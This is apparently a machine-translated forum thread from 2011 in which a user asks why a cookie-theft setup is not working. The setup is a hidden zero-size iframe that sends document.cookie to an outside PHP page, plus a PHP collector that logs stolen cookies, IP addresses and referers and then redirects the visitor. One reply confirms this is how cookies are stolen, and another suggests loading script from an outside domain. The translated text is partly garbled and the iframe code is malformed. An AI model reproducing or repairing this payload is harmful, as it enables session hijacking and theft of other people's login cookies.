在一个单独的域

<IFRAME WIDTH=0 HEIGHT=0 frameborder=0 SRC=jvoid(document.location="http://www.xxx.com/cookie.php?c"+document.cookie)></iframe>

然后传递一个iframe中的document.cookie从到PHP PHP文件：在一个单独的域

<?php 
$cookie = $_GET['c']; 
$ip = getenv ('REMOTE_ADDR'); 
$date=date("j F, Y, g:i a");; 
$referer=getenv ('HTTP_REFERER'); 
$fp = fopen('logs.html', 'a'); 
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br> <br> <br>'); 
fclose($fp); 
header ("Location: http://www.xxx.com"); 
?>

logs.html记录比cookie-为什么其他的一切吗？我测试了我的网站正在通过调用：document.cookie标签来正确显示cookie，所以其他内容已经启动。请指出我的愚蠢！

来源

2011-08-19 Maxi

我认为这是因为相同的原产地政策。

，否则这将是太容易偷别人的饼干:)

http://en.wikipedia.org/wiki/Same_origin_policy

来源

2011-08-19 17:25:59 PeeHaa

没有CORS违规。这是_exactly_你如何窃取某人的cookie。 – Halcyon

请注意，“document.cookie”作为查询字符串的一部分传递。 – Halcyon

为什么要这么做？反正我已经运行到这个链接：http://www.15seconds.com/issue/971108.htm回长..看看它的对你有用

，或者你可以按如下尝试使用此JS：

<script type="text/javascript"> 
    var script=document.createElement('script'); 
    script.setAttribute("type","text/javascript"); 
    script.setAttribute("src", 'http://xxx.com/ajaxHandler?getCookie&callback=passCookie'); 
    document.getElementsByTagName("head")[0].appendChild(newfile); 
</script>

和页面xxx.com/ajaxHandler?getCookie可以这样做：

passCookie({'name':'mycookie', 'value':'myvalue'});

来源

2011-08-19 17:33:10 Baz1nga

在一个单独的域

回答

相关问题